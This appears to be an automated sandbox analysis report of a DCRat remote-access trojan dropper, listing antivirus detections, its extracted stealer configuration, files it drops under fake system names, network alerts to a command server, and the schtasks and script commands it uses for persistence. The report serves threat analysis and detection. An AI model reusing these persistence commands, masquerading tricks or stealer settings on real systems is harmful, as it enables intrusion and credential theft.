Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe	Avira: detection malicious, Label: VBS/Runner.VPG

Found malware configuration

Source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"o\":\"^\",\"R\":\" \",\"v\":\"`\",\"J\":\"_\",\"t\":\"%\",\"H\":\"<\",\"w\":\"&\",\"V\":\",\",\"i\":\"#\",\"z\":\".\",\"c\":\"~\",\"y\":\"@\",\"U\":\"|\",\"S\":\"!\",\"j\":\">\",\"9\":\"$\",\"C\":\"-\",\"h\":\"(\",\"M\":\";\",\"X\":\")\",\"Y\":\"*\"}", "PCRT": "{\"l\":\"(\",\"v\":\">\",\"Z\":\"$\",\"U\":\".\",\"R\":\"_\",\"N\":\")\",\"D\":\";\",\"p\":\"!\",\"e\":\"^\",\"1\":\"<\",\"Q\":\"%\",\"d\":\"`\",\"Y\":\"&\",\"r\":\"#\",\"b\":\"@\",\"V\":\"-\",\"C\":\" \",\"o\":\"|\",\"W\":\"~\",\"5\":\"*\",\"B\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-YZYb6LRlx5C8eOzAhzqa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\RuntimeBroker.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\ShellExperienceHost.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Users\Default\Documents\WmiPrvSE.exe	ReversingLabs: Detection: 81%
Source: C:\Users\Public\Desktop\spoolsv.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: 5U9CuGu1ru.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Recovery\ShellExperienceHost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Users\Default\Documents\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Desktop\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 5U9CuGu1ru.exe

Joe Sandbox ML: detected

Source: 5U9CuGu1ru.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Mail\b7ad5a7a0bb6c8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8	Jump to behavior

Source: 5U9CuGu1ru.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5U9CuGu1ru.exe
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0080A5F4
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0081B8E0
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082AAA8 FindFirstFileExA,	0_2_0082AAA8

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49852 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49922 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49986 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49992 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49995 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49989 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49998 -> 141.8.197.42:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:50001 -> 141.8.197.42:80

Source: containerdll.exe, 00000006.00000002.2190779031.0000000002803000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0080718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0080718C

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Downloaded Program Files\b7ad5a7a0bb6c8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Logs\SettingSync\b7ad5a7a0bb6c8	Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080857B	0_2_0080857B
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_008170BF	0_2_008170BF
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082D00E	0_2_0082D00E
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080407E	0_2_0080407E
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00831194	0_2_00831194
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00803281	0_2_00803281
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080E2A0	0_2_0080E2A0
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_008202F6	0_2_008202F6
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00816646	0_2_00816646
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_008137C1	0_2_008137C1
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_008027E8	0_2_008027E8
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082070E	0_2_0082070E
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082473A	0_2_0082473A
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080E8A0	0_2_0080E8A0
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080F968	0_2_0080F968
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00824969	0_2_00824969
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00813A3C	0_2_00813A3C
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00816A7B	0_2_00816A7B
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00820B43	0_2_00820B43
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082CB60	0_2_0082CB60
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00815C77	0_2_00815C77
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081FDFA	0_2_0081FDFA
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080ED14	0_2_0080ED14
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00813D6D	0_2_00813D6D
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080BE13	0_2_0080BE13
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080DE6C	0_2_0080DE6C
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00805F3C	0_2_00805F3C
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_00820F78	0_2_00820F78
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F33565	6_2_00007FF848F33565
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F3C8CD	6_2_00007FF848F3C8CD
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 18_2_00007FF848F33565	18_2_00007FF848F33565
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F23565	20_2_00007FF848F23565
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F2CA6D	20_2_00007FF848F2CA6D
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F13565	22_2_00007FF848F13565
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F1CA59	22_2_00007FF848F1CA59
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 25_2_00007FF848F33565	25_2_00007FF848F33565

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: String function: 0081E28C appears 35 times
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: String function: 0081E360 appears 52 times
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: String function: 0081ED00 appears 31 times

Source: containerdll.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WmiPrvSE.exe.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RuntimeBroker.exe.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe0.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sihost.exe.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 5U9CuGu1ru.exe

Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5U9CuGu1ru.exe

Source: 5U9CuGu1ru.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@42/37@0/0

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_00806EC9 GetLastError,FormatMessageW,

0_2_00806EC9

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_00819E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00819E1C

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

File created: C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

File created: C:\Users\Public\Desktop\spoolsv.exe

Jump to behavior

Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\f34332c8b0c24f79d1f4b2e65f8ee056b06f8d1b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

File created: C:\Users\user\AppData\Local\Temp\Intodhcp

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Command line argument: sfxname	0_2_0081D5D4
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Command line argument: sfxstime	0_2_0081D5D4
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Command line argument: STARTDLG	0_2_0081D5D4

Source: 5U9CuGu1ru.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5U9CuGu1ru.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5U9CuGu1ru.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

File read: C:\Users\user\Desktop\5U9CuGu1ru.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5U9CuGu1ru.exe "C:\Users\user\Desktop\5U9CuGu1ru.exe"
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
